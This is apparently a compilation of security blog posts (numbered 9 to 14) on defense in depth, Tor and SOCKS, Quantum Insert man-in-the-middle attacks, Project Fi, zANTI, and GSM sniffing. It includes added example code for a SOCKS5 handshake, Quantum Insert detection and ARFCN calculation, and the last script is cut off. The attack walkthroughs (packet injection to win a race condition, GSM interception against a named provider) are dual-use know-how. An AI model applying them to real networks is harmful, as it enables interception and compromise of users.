Mukhopadhyay, I. (2014). Hardware Realization of Artificial Neural Network Based Intrusion Detection & Prevention System. Retrieved from http://file.scirp.org/Html/3-7800230_50045.htm
Onuwa, O. (2014, November 29). Improving Network Attack Alarm System: A Proposed Hybrid Intrusion Detection System Model. Retrieved from http://www.computerscijournal.org/vol7no3/improving-network-attack-alarm-system-a-proposed-hybrid-intrusion-detection-system-model/
Saied, A. (n.d.). Artificial Neural Networks in the detection of known and unknown DDoS attacks: Proof-of-Concept. Retrieved from http://www.inf.kcl.ac.uk/staff/richard/PAAMS-WASMAS_2014.pdf
Surana, S. (2014). Intrusion Detection using Fuzzy Clustering and Artificial Neural Network. Retrieved from http://www.wseas.us/e-library/conferences/2014/Gdansk/FUNAI/FUNAI-32.pdf
Vieira, K. (2010, August). Intrusion Detection for Grid and Cloud Computing. Retrieved from http://www.inf.ufsc.br/~westphal/idscloud.pdf
Wang, L. (n.d.). Artificial Neural Network for Anomaly Intrusion Detection. Retrieved from https://www.cs.auckland.ac.nz/courses/compsci725s2c/archive/termpapers/725wang.pdf
Zakaria, O. (n.d.). Identify Features and Parameters to Devise an Accurate Intrusion Detection System Using Artificial Neural Network. Retrieved from http://www.academia.edu/2612588/Identify_Features_and_Parameters_to_Devise_an_Accurate_Intrusion_Detection_System_Using_Artificial_Neural_Network
Zamani, M. (2013, December 8). Machine Learning Techniques for Intrusion Detection. Retrieved from http://arxiv.org/pdf/1312.2177.pdf

Source
  9. Defense in depth is dead.

The way you’re thinking about data center security is outdated. Security started changing long before Sony, Target and the others got hacked. The problem starts with your perimeter.

During a conversation with Pete Lindstrom of IDC, we paused to consider the state of defense in depth. “Circling wagons is just impossible,” Pete said. “With apps strewn across the internet, if a corporation thinks they can build a perimeter around all their apps then they are nuts.”

By expanding the definition of cloud computing to include cloud-based accounting, CRM, email services, and development tools, people discover that their organizations have been using cloud for years, without fully realizing it. In 2014, IDC reported that 69% of enterprises worldwide have at least one application or a portion of their computing infrastructure in the cloud. In Europe, adoption is also growing but at a slightly slower rate, with 19% of EU enterprises using cloud computing in 2014, according to the European Union‘s Eurostat. Bottom line: more enterprise data is living outside of the protected data center.

When your definition of defense in depth is adding layers of security to the data center perimeter and physical data segmentation, modern cloud applications are indeed insecure. Instead, the enterprise should focus on the application, data, and user as the important security layers. In a 2015 report from Accenture and the Ponemon Institute, the authors note that proactive organizations are prioritizing network traffic anomalies, identifying vulnerabilities and limiting unauthorized data sharing, while the “static” companies focus on employees’ device security and data backup.

Let’s examine the Sony Pictures hack. The Sony hackers gained access through former employees’ accounts, and easily cracked the perimeter. The real damage occurred once they exploited the weak internal network security.
All the critical applications – email servers, accounting data, and copyrighted motion pictures – were all connected “on a wire” inside the corporate network. The perimeter-heavy, fortify-the-exterior approach to security is indeed dead. In fact, when it fails to stop cybercrime, this strategy can cost you upwards of $100M.

Each enterprise application should be considered critical and deserves its own perimeter inside any network environment. With Sony, or any organization, critical data means all data. For a manufacturer, critical data might be product designs as well as the obvious accounting and customer data. Plus, nearly 85% of insider attacks or “privilege misuse” attacks used the target enterprises’ corporate local area network (LAN), according to a 2014 Verizon security report.

To truly guard and protect an application, enterprises need to control all data and network traffic via secure, encrypted switches at every layer within a network. Defense shouldn’t end at the data center pediment, but extend down to each individual application. Monitored access, encryption, and application-specific firewall rules can all but eliminate malicious “east/west” movement inside a network. This approach to application-specific defense in depth continues the concept of physical segmentation into “application segmentation.” Each application owner within an organization can dictate how traffic flows to each application server through an encrypted network switch. When data passes through a secure application perimeter, application owners can easily monitor and isolate traffic and prevent unauthorized access. Even with only basic interior firewall rules, an enterprise can protect itself from a Sony-style data exploit.

Source
  10. Introduction

When it comes to anonymizing activities in the digital world, it can be referred to in various ways. Researchers might use it to identify various malicious activities and for back trailing, whereas hackers can anonymize their activities so as to build up a cover around their malicious activities. These anonymizing activities can really increase the work of researchers, as they can’t trust the attributes mentioned in the logs like IP address, user agent, etc., as such attributes will only give false information. In this article series, we will learn about anonymizing activities from a very basic level to an advanced level.

Anonymity with TOR

The Onion Router, widely known as TOR, is famous for staying anonymous on the Internet. Tor is a network of computers around the world that forward requests in an encrypted manner from the start of the request until it reaches the last machine in the network, which is known as an exit node. From the last node of the TOR network, the request is decrypted and sent to the destination server. Thus exit nodes are the first nodes and last nodes in the TOR network for receiving and sending traffic from and to the original and destination server. Thus, to the destination server all traffic seems to come from the exit node in the TOR network, thus hiding the IP address of the original sender. Even the other systems in the TOR network cannot determine the location either, because they are essentially forwarding traffic with no knowledge of where it actually originated. The responses to original requests will return to the system, but as far as the TOR network is concerned, a request is just another hop along the way.

SOCKS server

TOR works with the SOCKS protocol, so it is worth talking about SOCKS. A SOCKS server establishes a proxy TCP connection with another server on behalf of the client and then routes all the traffic back and forth between the client and the server. It works for any kind of network protocol on any port.
SOCKS Version 5 adds additional support for security and UDP. The SOCKS server does not interpret the network traffic between client and server in any way, and is often used because clients are behind a firewall and are not permitted to establish TCP connections to servers outside the firewall unless they do it through the SOCKS server. Most web browsers, for example, can be configured to talk to a web server via a SOCKS server. Because the client must first make a connection to the SOCKS server and communicate which host it wants to connect to, the client must be “SOCKS enabled”. SOCKS uses a handshake protocol to inform the proxy software about the connection that the client is trying to make, and then acts as transparently as possible, whereas a regular proxy may interpret and rewrite headers.

Comparison of SOCKS and HTTP

As can be inferred from the above text about SOCKS, its function is similar to that of HTTP. But there is a significant difference between SOCKS and HTTP, as SOCKS operates at one level lower than HTTP proxying. HTTP allows forwarding TCP connections, whereas SOCKS can also forward UDP traffic and work in reverse. Let’s understand the difference with an example:

SOCKS: Suppose User ‘A’ wants to connect with User ‘B’ over the Internet, but a firewall between them is restricting the users from connecting with each other. User ‘A’ connects to a SOCKS proxy in his network, which opens a connection through the firewall, and a communication channel between User ‘A’ and ‘B’ is achieved.

HTTP: Suppose User ‘A’ wants to download a web page from web server ‘B’, but because of the presence of a firewall between them, User ‘A’ is not able to do so, so User ‘A’ connects to an HTTP proxy, and in turn A’s browser communicates with the proxy in exactly the same way that it would directly with B’s server if that was possible, meaning it sends a standard HTTP request header. The HTTP proxy connects to B’s server, and then transmits back to ‘A’ any data that B’s server returns.
TOR hidden services

TOR is also being used to hide websites and other servers. This works by using what is called an associated onion address rather than the website’s original IP address. This model is more secure than the original TOR model traffic, since hidden services do not use exit nodes. Communication is encrypted end to end. Below are some of the TOR hidden services:

Search Engines: TorSearch
P2P file sharing: The Pirate Bay
Social Media: Facebook
Commerce: Evolution, Silk Road etc.

TOR weaknesses

Although TOR is a strong way to anonymize activities in the digital world, the TOR network has some weaknesses too. Below are some of the weaknesses that the TOR network has:

The TOR network is subject to eavesdropping attacks. Since the TOR model involves exit nodes and traffic from the exit node to the destination node is not encrypted, eavesdropping attacks are possible. One possible solution to this is to always access the HTTPS version of the service.
TOR exit node block: Some websites block traffic if the last node is a TOR node, thus reducing the functionality for TOR users.
TOR is also vulnerable to traffic analysis attacks, correlation attacks, sniper attacks, etc.

TOR configuration

TOR can be easily installed on the system, and after connecting to the TOR network, the user can anonymize his activities. Consider the following commands to use in Ubuntu.

Install TOR as root: apt-get install tor
Check the IP address of the system without TOR
Install the TOR bundle from the TOR website
Extract the content and run the .exe
If you are running as root, then the system might display an error saying that “TOR cannot be run as root”. To overcome this, open the file in a text editor and comment the following lines:
After this, start the TOR bundle .exe and notice the IP address. The IP address should not be the same as your machine’s IP.

So in this article, we have learnt about what TOR is, how it is different from HTTP, and how easy it is to install and configure TOR on a machine.
In the next article, we will learn about some more ways of anonymizing.

References

http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29

Source
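The SOCKS5 handshake the post describes (greeting, method selection, then a CONNECT request naming the host), as an added example that is not part of the original post or of any Tor code. The message layouts follow RFC 1928; the in-memory stand-in proxy, the bound address 127.0.0.1:9050 it answers with and the hostname example.onion are constructed for the demo, and the point it shows is that a SOCKS-enabled client hands the hostname to the proxy instead of resolving it locally.

```python
"""SOCKS5 handshake walk-through (RFC 1928).  Constructed example: the
'proxy' is an in-memory stand-in, so no network traffic is sent."""
import socket
import struct

SOCKS_VERSION = 0x05
METHOD_NO_AUTH = 0x00
METHOD_NO_ACCEPTABLE = 0xFF
CMD_CONNECT = 0x01
ATYP_IPV4, ATYP_DOMAIN, ATYP_IPV6 = 0x01, 0x03, 0x04
REP_SUCCEEDED = 0x00


def build_greeting(methods=(METHOD_NO_AUTH,)) -> bytes:
    """Client -> proxy: VER | NMETHODS | METHODS."""
    return bytes([SOCKS_VERSION, len(methods), *methods])


def parse_method_select(data: bytes) -> int:
    """Proxy -> client: VER | METHOD.  Raises if no offered method was accepted."""
    if len(data) != 2 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 method-selection reply")
    if data[1] == METHOD_NO_ACCEPTABLE:
        raise ConnectionError("proxy accepted none of the offered methods")
    return data[1]


def encode_addr_port(host: str, port: int) -> bytes:
    """ATYP | ADDR | PORT.  IP literals go as ATYP 1/4; anything else is sent
    as a domain name (ATYP 3) so the proxy, not the client, resolves it.
    That is what keeps a SOCKS-enabled client behind Tor from leaking DNS."""
    for family, atyp in ((socket.AF_INET, ATYP_IPV4), (socket.AF_INET6, ATYP_IPV6)):
        try:
            return bytes([atyp]) + socket.inet_pton(family, host) + struct.pack("!H", port)
        except OSError:
            pass
    raw = host.encode("idna")
    if not 0 < len(raw) < 256:
        raise ValueError("hostname length must be 1..255 bytes")
    return bytes([ATYP_DOMAIN, len(raw)]) + raw + struct.pack("!H", port)


def decode_addr_port(data: bytes, off: int):
    """Inverse of encode_addr_port, reading from data[off:]; returns (addr, port)."""
    atyp = data[off]
    if atyp == ATYP_IPV4:
        addr, n = socket.inet_ntop(socket.AF_INET, data[off + 1:off + 5]), 4
    elif atyp == ATYP_IPV6:
        addr, n = socket.inet_ntop(socket.AF_INET6, data[off + 1:off + 17]), 16
    elif atyp == ATYP_DOMAIN:
        n = 1 + data[off + 1]
        addr = data[off + 2:off + 1 + n].decode("idna")
    else:
        raise ValueError("unknown address type %#x" % atyp)
    (port,) = struct.unpack("!H", data[off + 1 + n:off + 3 + n])
    return addr, port


def build_connect(host: str, port: int) -> bytes:
    """Client -> proxy: VER | CMD | RSV | ATYP | DST.ADDR | DST.PORT."""
    return bytes([SOCKS_VERSION, CMD_CONNECT, 0x00]) + encode_addr_port(host, port)


def parse_connect_reply(data: bytes):
    """Proxy -> client: VER | REP | RSV | ATYP | BND.ADDR | BND.PORT."""
    if len(data) < 4 or data[0] != SOCKS_VERSION:
        raise ValueError("not a SOCKS5 reply")
    return (data[1],) + decode_addr_port(data, 3)


class ConstructedProxy:
    """In-memory stand-in for a SOCKS5 proxy; records what the client asked for."""

    def __init__(self):
        self.stage, self.requested = "greeting", None

    def handle(self, msg: bytes) -> bytes:
        if self.stage == "greeting":
            self.stage = "request"
            offered = msg[2:2 + msg[1]]
            if msg[0] != SOCKS_VERSION or METHOD_NO_AUTH not in offered:
                return bytes([SOCKS_VERSION, METHOD_NO_ACCEPTABLE])
            return bytes([SOCKS_VERSION, METHOD_NO_AUTH])
        self.requested = decode_addr_port(msg, 3)      # the proxy sees the hostname itself
        bound = encode_addr_port("127.0.0.1", 9050)    # constructed bound address
        return bytes([SOCKS_VERSION, REP_SUCCEEDED, 0x00]) + bound


def socks5_handshake(proxy, host: str, port: int):
    """Full exchange against `proxy`; returns (bound_addr, bound_port) or raises."""
    parse_method_select(proxy.handle(build_greeting()))
    rep, addr, bport = parse_connect_reply(proxy.handle(build_connect(host, port)))
    if rep != REP_SUCCEEDED:
        raise ConnectionError("CONNECT refused, reply code %#x" % rep)
    return addr, bport


if __name__ == "__main__":
    p = ConstructedProxy()
    print(socks5_handshake(p, "example.onion", 80), p.requested)
```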
  11. A Quantum Insert Attack is a classic example of a man-in-the-middle attack which resurfaced in the news among the top 10 biggest leaks by WikiLeaks founder Edward Snowden. The NSA and Britain’s GCHQ intelligence services allegedly used it against OPEC and Belgacom successfully for their benefit. In short – Quantum is a code name for the servers which are strategically placed by the NSA and GCHQ that can respond faster to a request than the intended recipient. The attacker would need monitoring capabilities to successfully attack the victim. Once the quantum servers win the race condition against the original response, the attacker can steal sensitive data like login credentials, bank account details, and credit card numbers or even spread malware which can work in tandem with a botnet C&C server.

Understanding the attack

The attack begins with the attacker gaining monitoring capabilities into the victim’s network. In a government sponsored attack, the monitoring capabilities can be gained through Internet Service Providers, and in the case of cyber espionage crimes, by having access within a network and looking to move laterally inside. This kind of attack is generally not used for large scale attacks; instead the attacker is very well aware of his target and its most frequently used websites. In the past, Snowden leaks revealed that LinkedIn and Slashdot users have been targeted for attacks. The crux of the attack is in winning the race condition against the legitimate response packets. The schematic diagram here will help you understand better:

Step 1:
Step 2:
Step 3:

In the above schematic diagram, we see that the attacker waits on the network for the target to initiate a connection with a particular website. Each quantum server is configured so that certain conditions are met. Once any request from the target fulfills this set of conditions, the attacker is notified of the request from the target. The quantum servers then shoot a response to the original request by the victim.
The victim receives the malicious payload, and the attacker can have full control of the victim. The original response packets from the website are discarded.

Simulating the attack

To simulate the Quantum Insert attack, we would require three VMs:

One VM will act as a victim
Second VM will be used to monitor the traffic
Third will be used to shoot a malicious payload to the victim.

The proof-of-concept code for simulation is available to be downloaded here: Download

Though the details of use for the script are given on the GitHub page, let me reiterate them here for quick reference. The attacker knows that the victim frequents mysite.com and configures his monitor.py to notify the shooter on matching certain conditions. In our case the conditions are as follows:

Victim visits mysite.com
We need SYN+ACK of mysite.com

On getting this information via tcpdump (whose output is parsed by monitor.py) the shooter is notified. The shooter has a dependency on Scapy to craft packets (with the same header details, but a different payload) to be sent to the victim. The only challenge here is to have a privileged position in the Internet backbone, to win the race condition.

How real time QI works

I. Foot printing

Agencies like the NSA and GCHQ catch hold of a choke point in the Internet backbone, and try to catch hold of the identity of the users from the organization that is being targeted. The project codenamed TURMOIL captures the network dumps and passes them to traffic analysis tools like XKeyscore which automate the packet analysis.

II. Build User Profiles

Tools like XKeyscore can be used to search for patterns in the network traffic which help in identifying multiple points of attack. The kinds of data which are captured include web histories, email traffic, chat logs etc. It seems that in a particular case of QI attacks on OPEC, this phase went on for several years.

III. Attack the target

Once the attack points are profiled, the monitor at the choke point of the Internet backbone notifies the shooter when any requests fulfilling all the conditions are met. In the case of the Belgacom hack, GCHQ used the QI attack to route the traffic for LinkedIn and Slashdot to malicious servers posing as those sites.

IV. Maintain access and persist

Once the attack is successful, it’s the same old mundane post exploitation tasks where the attacker tries to escalate privileges and laterally move within the network in stealth mode to get his hands on sensitive data and other network resources like mail servers, file servers etc., which are then exfiltrated to data analysis experts.

Detecting QI attacks

QI attacks work by spoofing the packets in response to a request to a particular website. One packet in response to a GET request from the victim contains content for the real website, and another packet will contain content for the malicious website. But both of these packets are bound to have the same sequence numbers, which is a giveaway while detecting QI attacks. Another anomaly to be noticed is the TTL value of the packet. The spoofed packets would contain a significant difference in the TTL values from the real packets because of the closer proximity of the attacker to the victim.

Links for QI detection for snort: GitHub
Links for QI PCAPS: GitHub

References

http://blog.fox-it.com

Source
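The two giveaways named under "Detecting QI attacks" (a second segment reusing a sequence number with different content, and a TTL that does not match the rest of the flow), as an added detection example that is not part of the original post and not the Fox-IT Snort rules it links. The packet list is constructed with RFC 5737 documentation addresses; the TTL tolerance of 3 hops is an assumption to tune against real path jitter.

```python
"""Quantum Insert heuristics run over a constructed list of TCP segments.
Added example; not the Fox-IT detection rules linked in the post."""
from collections import Counter, defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class Segment:
    """The handful of IP/TCP fields the two heuristics need."""
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    ttl: int
    payload: bytes


def flow_key(s: Segment):
    return (s.src, s.sport, s.dst, s.dport)


def find_duplicate_seq(segments):
    """Two segments in one flow with the same SEQ but different payload: the
    legitimate reply and the injected one both claim the same stream bytes.
    Returns (flow, seq, ttl_of_first_seen, ttl_of_conflicting) per hit."""
    first = defaultdict(dict)          # flow -> seq -> first segment seen
    alerts = []
    for s in segments:
        if not s.payload:              # SYN-ACK / pure ACK carry no stream bytes
            continue
        prev = first[flow_key(s)].get(s.seq)
        if prev is None:
            first[flow_key(s)][s.seq] = s
        elif prev.payload != s.payload:
            alerts.append((flow_key(s), s.seq, prev.ttl, s.ttl))
    return alerts


def find_ttl_anomalies(segments, tolerance=3):
    """Flag segments whose IP TTL strays from the flow's usual TTL by more than
    `tolerance` hops: a shooter closer to the victim than the real server
    arrives with a noticeably different TTL.  `tolerance` is an assumption
    for this example; set it from the path variability you actually observe."""
    by_flow = defaultdict(list)
    for s in segments:
        by_flow[flow_key(s)].append(s)
    alerts = []
    for flow, segs in by_flow.items():
        baseline = Counter(s.ttl for s in segs).most_common(1)[0][0]
        for s in segs:
            if abs(s.ttl - baseline) > tolerance:
                alerts.append((flow, s.seq, baseline, s.ttl))
    return alerts


def detect(segments):
    """Run both heuristics; returns {seq: set_of_reasons} for suspicious SEQs."""
    findings = defaultdict(set)
    for _flow, seq, _a, _b in find_duplicate_seq(segments):
        findings[seq].add("duplicate-seq-different-payload")
    for _flow, seq, _base, _ttl in find_ttl_anomalies(segments):
        findings[seq].add("ttl-anomaly")
    return dict(findings)


# Constructed capture: server 203.0.113.10:80 answering victim 192.0.2.5:51000.
SERVER, VICTIM = ("203.0.113.10", 80), ("192.0.2.5", 51000)


def _from_server(seq, ttl, payload):
    return Segment(SERVER[0], SERVER[1], VICTIM[0], VICTIM[1], seq, ttl, payload)


SAMPLE_CAPTURE = [
    _from_server(0, 52, b""),                                                   # SYN-ACK, real server
    _from_server(1, 61, b"HTTP/1.1 200 OK\r\n\r\n<constructed injected body>"),   # wins the race
    _from_server(1, 52, b"HTTP/1.1 200 OK\r\n\r\n<constructed legitimate body>"),
    _from_server(49, 52, b"<constructed legitimate continuation>"),
    _from_server(86, 51, b"<constructed legitimate tail>"),                     # 1 hop jitter, ignored
]

if __name__ == "__main__":
    print(detect(SAMPLE_CAPTURE))
```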
  12. Google launches its own mobile network for Nexus 6 owners

Google is now a mobile carrier. Today the company has made official its plan to offer wireless service to owners of its Nexus 6 smartphone. It's called Project Fi, and Google is launching an early invite program beginning today. "Similar to our Nexus hardware program, Project Fi enables us to work in close partnership with leading carriers, hardware makers, and all of you to push the boundaries of what's possible," the company wrote in a blog post.

The service is only available for the Nexus 6 and requires a special SIM card for Project Fi — it will work with both existing Nexus 6 devices and new ones. Google says that right now the service is only available as an "early access program," and during that program it won't work on other phones.

Google's new offering is unique in that the company will charge consumers only for the data they use rather than hit them with a flat monthly fee that comes with a preset amount of data. If you fail to use all the data you've paid for, Google will refund you the difference. If you go over your plan, Google will simply charge you at a pro-rated rate of $10 per GB. In other words, if you pay for data and don't use it, you get refunded. If you don't buy data and use it, you end up paying the same amount. There are no family plans available, but neither does it require a contract of any kind.

As reported previously, Google will operate its wireless service with the help of both T-Mobile and Sprint; customers will have access to both networks, and Google's service will intelligently switch between them and Wi-Fi to maintain strong reception. "We developed new technology that gives you better coverage by intelligently connecting you to the fastest available network at your location whether it's Wi-Fi or one of our two partner LTE networks," the company said.
Project Fi also supports voice calls and texting over Wi-Fi, lending subscribers more flexibility in how and where they can communicate with their contacts. Google also says it's using secure tech (there's a key that shows up in your menu bar) for when you're using public Wi-Fi hotspots. Google says Project Fi phone numbers "live in the cloud," enabling you to text and place voice calls from a laptop or tablet without your actual phone nearby. When you are on the phone, Google says calls can seamlessly transition to LTE when you leave a Wi-Fi network. Google seems to be using the new, combined Hangouts / Google Voice infrastructure in some way for Fi, as its FAQ references it often.

If you're interested in being part of Google's mobile experiment, the signup page is here. Google says it'll be sending out a small number of invites every week starting now.

Source: Google launches its own mobile network for Nexus 6 owners | The Verge
  13. zANTI is a mobile penetration testing toolkit that lets security managers assess the risk level of a network with the push of a button. This easy-to-use mobile toolkit enables IT Security Administrators to simulate an advanced attacker to identify the malicious techniques they use in the wild to compromise the corporate network.
  14. Introduction

The Global System for Mobile Communication or GSM is a wireless communication technology that uses digital technology and is widely deployed across the globe for mobile communications, such as mobile phones. This technology utilizes microwaves, and its signal transmission is divided by time, mostly known as Time Division Multiple Access (TDMA). In this article, I will be discussing the method that could be used to see the traffic on a GSM network and how an attacker could abuse the GSM network.

Mobile communication technology was already developed and widely used in the early 1980s. For the first time, the C-NET system was developed in Germany and Portugal by Siemens, the RC-2000 system was developed in France, and the NMT system was developed in the Netherlands and Scandinavia by Ericsson, as well as the TACS system which operates in the UK. GSM appeared in mid-1991 and eventually turned into the mobile telecommunications standard for the whole of Europe, maintained by the ETSI (European Telecommunications Standards Institute) technical committee. GSM started its commercial operation at the beginning of the last quarter of 1992 because GSM is a complex technology and needed more assessment to be used as a standard protocol. In September 1992, type approval standards for mobile agreed to consider and incorporate dozens of test items for GSM production.

In Europe, GSM was originally designed to operate at the frequency of 900 MHz. In this frequency, the uplinks use frequencies between 890 MHz to 915 MHz, and frequencies between 935 MHz to 960 MHz are used for downlinks. The bandwidth used is 25 MHz ((915 – 890) = (960 – 935) = 25 MHz), with a channel width of 200 kHz.

GSM Network Architecture

Typical GSM network architecture is divided into 3 parts:

Mobile Station (MS)
Base Station Sub-system (BSS)
Network Sub-system (NSS)

All elements of the network above form a PLMN (Public Land Mobile Network).

Picture 1. GSM network architecture.
Mobile Station or MS is a device used by the customer for making phone calls. This device consists of:

Mobile Equipment (ME) or the handset (UM) is a GSM device that is located on the user’s or customer’s end that serves as a terminal transceiver (transmitter and receiver) to communicate with other GSM devices.
Subscriber Identity Module (SIM) or SIM card is a card that contains all customer information and some information about services. ME can’t be used without SIM in it, except for emergency calls. The data stored in the SIM in general are:
International Mobile Subscriber Identity (IMSI).
Mobile Subscriber ISDN (MSISDN).
Encryption mechanism.

Base Station System or BSS consists of:

Base Transceiver Station (BTS) is a GSM device that is directly related to MS and serves as the sender and receiver.
Base Station Controller (BSC) is a controller device for base stations located between the BTS and MSC.

Network Sub System or NSS consists of:

Mobile Switching Center (MSC) is a central network element in a GSM network. MSC works as the core of a cellular network, where MSC main role is for interconnection, both among the cellular or wired network PSTN or with the data network.
Home Location Register (HLR) is a database that saves the data and customer information permanently.
Visitor Location Register (VLR) is a database of the subscribers who have roamed into the jurisdiction of the Mobile Switching Center (MSC) which it serves.
Authentication Center (AuC) authenticates each SIM card that attempts to connect to the GSM core network (typically when the phone is powered on). This also checks the validity of the customer.
Equipment Identity Registration (EIR), is often integrated to the HLR. The EIR keeps a list of mobile phones (identified by their IMEI) to be banned from the network or monitored. This is designed to allow tracking of stolen mobile phones.

GSM Layer

There are 3 layers in the GSM network:

Layer 1 or the physical layer, for setting the channels.
Layer 2 or the data-link layer, whose main role is to identify the data that is sent from UM to BTS.
Layer 3 consists of 3 parts: Radio Resource (RR), Mobility Management (MM) and Call Control (CC), which serve as regulators for radio, mobility management and call control.

Illustration of How GSM Works

Picture 2. Illustration of how GSM works.

The mobile phone is input with the destination number and connects to the nearest BTS.
BSC and BTS send to the MSC to continue and proceed to the AuC for checking the user identification.
MSC proceeds to the HLR / VLR to check the existence of the mobile phone.
BSC and MSC proceed to the nearest BTS where the destination mobile is located.

Problem

The background of this issue lies in the GSM network. Due to the leaking of the design of the encryption in 1994, it could be attacked, such as by sniffing the voice in an established communication.

Attacking

1. Packet Analysis

At this stage, the attacker will do packet analysis on one of the GSM providers (for this example, the attacker will attack one of the service providers in Indonesia). The attacker is using multiple devices for packet analysis (Openmoko and Nokia 3310) and using Wireshark to dissect information used in GSM networks such as:

Encryption used by the provider.
ARFCN number.
Location of the mobile phone, etc.

The first step is that the attacker will analyze the encryption used by the provider:

Picture 3. A5/1 encryption used by the provider.

In the picture above, the encryption used by the provider is A5/1. In the second packet, we could see the location in ARFCN, because ARFCN is the determinant of the uplink and downlink signal to a GSM network.

Picture 4. ARFCN (downlink) in use.

From the above picture, we could see that the provider uses ARFCN 881.
For more details, the frequency for ARFCN 881 is as follows:

ARFCN: 881
Downlink frequency: 1879000000 Hz
Uplink frequency: 1784000000 Hz
Distance: 95000000 Hz
Offset: 512
Band: GSM1800 (DCS 1800)

It could be assumed that the provider uses encryption A5/1 and the 1879000000 Hz frequency for downlink and 1784000000 Hz for uplink. However, the ARFCN is not static in a communication.

Picture 5. ARFCN calculation (GSM 1800)
Picture 6. GSM900 frequency allocation in Indonesia.
Picture 7. GSM1800 frequency allocation in Indonesia.

2. Authentication of a Communication

When the MS communicates with a BTS, the MS identifies itself using IMSI and IMEI, and the BSC communicates with the MSC to respond to the IMSI. The authentication function is to assure that the MS is a legitimate user. An illustration can be seen in the image below:

Picture 8. MS Authentication flow.

An explanation for the above picture is as follows:

MS sends IMSI and IMEI to BSC.
BSC requests IMSI and IMEI to MSC.
MSC responds and sends RAND, SRES and Ki.
BSC sends RAND to MS.
MS responds with SRES’.
BSC checks SRES’.

3. Kc Generation On A5/1

Picture 9. Kc generation on A5/1.

The picture above shows the process of Kc generation before being used to send and receive a communication. RAND is a random number generated by the AuC when a customer makes an authentication request to the network. RAND is used to generate SRES and Kc. Ki is the authentication key paired with the IMSI when a SIM card is made. Ki only exists on the SIM card and the Authentication Center (AuC). Ki never gets transmitted over the GSM network. A8 is an algorithm that’s being used to calculate Kc. Ki and RAND are inserted into the A8 algorithm and the result is Kc. The A8 algorithm exists on the SIM card and the AuC. Kc is the key used in the A5 encryption algorithm to encipher and decipher data that is being sent when communication occurs.

4. Sniffing GSM In Realtime

In order to be able to sniff a GSM packet, you must have hardware that works as a receiver.
For example, the RTL-SDR with the rtl2832 chip. However, this hardware has a limitation: the maximum packet capture is 16 kHz wide. In other words, not all GSM packets can be captured using this hardware.

Picture 10. Sample packet captured with rtl2832 DVB (max 16 kHz).

GSM uses 200 kHz for communication and it is divided into 8 slots (200 kHz / 8 = 25 kHz / slot).

Picture 11. Downlink and uplink frame illustration.

Before we could start capturing GSM packets, first we must know the ARFCN in use. One method that could be used to find out the ARFCN is by using the Blackberry Engineering Mode. In order to use that feature, you can simply search for “blackberry engineering mode calculator“. After entering the engineering mode, you can see the ARFCN currently in use, as you may see in this picture:

Picture 12. Blackberry engineering mode (ARFCN 114).

After knowing the ARFCN, we could proceed to capture the downlink packets. The capturing process could be seen in this picture (the result is not optimal due to a standard antenna being used):

Picture 13. Sample captured with DVB (only to see the downlink frequency).

From the above picture, we could see that the signal is not strong enough, and this could increase the packets lost during the capture period. Here’s an example of captured GSM packets using RTL-SDR and analyzed using Wireshark:

Picture 14. Sample GSM packet captured using RTL-SDR and analyzed using Wireshark.

Conclusion

From the above explanation, we could conclude that communication through GSM exposes some security concerns. An attacker who understands how the GSM protocol works and has complete GSM standard documentation could find a way to attack GSM networks, especially if security is poorly implemented.

Source
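The ARFCN-to-frequency calculation behind the ARFCN 881 listing and the ARFCN 114 reading in the post, written out as an added example for this thread (it is not code from the original post). It follows the standard 3GPP channel numbering (200 kHz spacing, 45 MHz duplex distance on GSM900 and 95 MHz on DCS 1800) and also maps a downlink carrier seen on an SDR waterfall back to its ARFCN; the PCS 1900 handling goes beyond the two bands the post discusses.

```python
"""ARFCN <-> carrier frequency calculator for the GSM bands.

Added example for this thread, not code from the original post. Uses the
public 3GPP TS 45.005 channel numbering (200 kHz channel spacing and a
fixed duplex spacing per band); frequencies are kept as integer Hz so the
arithmetic is exact and comparable with the figures quoted in the post.
"""
from dataclasses import dataclass

CHANNEL_SPACING_HZ = 200_000


@dataclass(frozen=True)
class Channel:
    arfcn: int
    band: str
    offset: int          # first ARFCN of the band's numbering formula
    uplink_hz: int       # MS -> BTS carrier
    downlink_hz: int     # BTS -> MS carrier

    @property
    def distance_hz(self) -> int:
        """Duplex spacing between the uplink and downlink carriers."""
        return self.downlink_hz - self.uplink_hz

    def describe(self) -> str:
        """Same layout as the ARFCN 881 listing in the post."""
        return (f"ARFCN: {self.arfcn}\n"
                f"Downlink frequency: {self.downlink_hz} Hz\n"
                f"Uplink frequency: {self.uplink_hz} Hz\n"
                f"Distance: {self.distance_hz} Hz\n"
                f"Offset: {self.offset}\n"
                f"Band: {self.band}")


def arfcn_to_channel(arfcn: int, pcs1900: bool = False) -> Channel:
    """Map an ARFCN to its uplink/downlink carrier pair.

    ARFCNs 512-810 are used by both DCS 1800 and PCS 1900 (the American
    band); pass pcs1900=True to resolve them as PCS 1900.
    """
    if 1 <= arfcn <= 124:                      # P-GSM 900
        band, offset, duplex = "GSM900 (P-GSM)", 0, 45_000_000
        uplink = 890_000_000 + CHANNEL_SPACING_HZ * arfcn
    elif arfcn == 0 or 975 <= arfcn <= 1023:   # E-GSM 900 extension below 890 MHz
        band, offset, duplex = "GSM900 (E-GSM)", 1024, 45_000_000
        uplink = 890_000_000 + CHANNEL_SPACING_HZ * (arfcn - 1024 if arfcn else 0)
    elif pcs1900 and 512 <= arfcn <= 810:      # PCS 1900
        band, offset, duplex = "PCS1900", 512, 80_000_000
        uplink = 1_850_200_000 + CHANNEL_SPACING_HZ * (arfcn - 512)
    elif 512 <= arfcn <= 885:                  # DCS 1800
        band, offset, duplex = "GSM1800 (DCS 1800)", 512, 95_000_000
        uplink = 1_710_200_000 + CHANNEL_SPACING_HZ * (arfcn - 512)
    else:
        raise ValueError(f"ARFCN {arfcn} is not a GSM900/DCS1800/PCS1900 channel")
    return Channel(arfcn, band, offset, uplink, uplink + duplex)


def downlink_to_arfcn(downlink_hz: int, pcs1900: bool = False) -> int:
    """Inverse lookup: which ARFCN does a downlink carrier observed on the
    SDR belong to? Raises ValueError if it is not on the 200 kHz grid."""
    for arfcn in range(0, 1024):
        try:
            if arfcn_to_channel(arfcn, pcs1900).downlink_hz == downlink_hz:
                return arfcn
        except ValueError:
            continue
    raise ValueError(f"{downlink_hz} Hz is not a GSM downlink carrier")


if __name__ == "__main__":
    # The two channels mentioned in the post: ARFCN 881 (DCS 1800) and 114 (GSM900)
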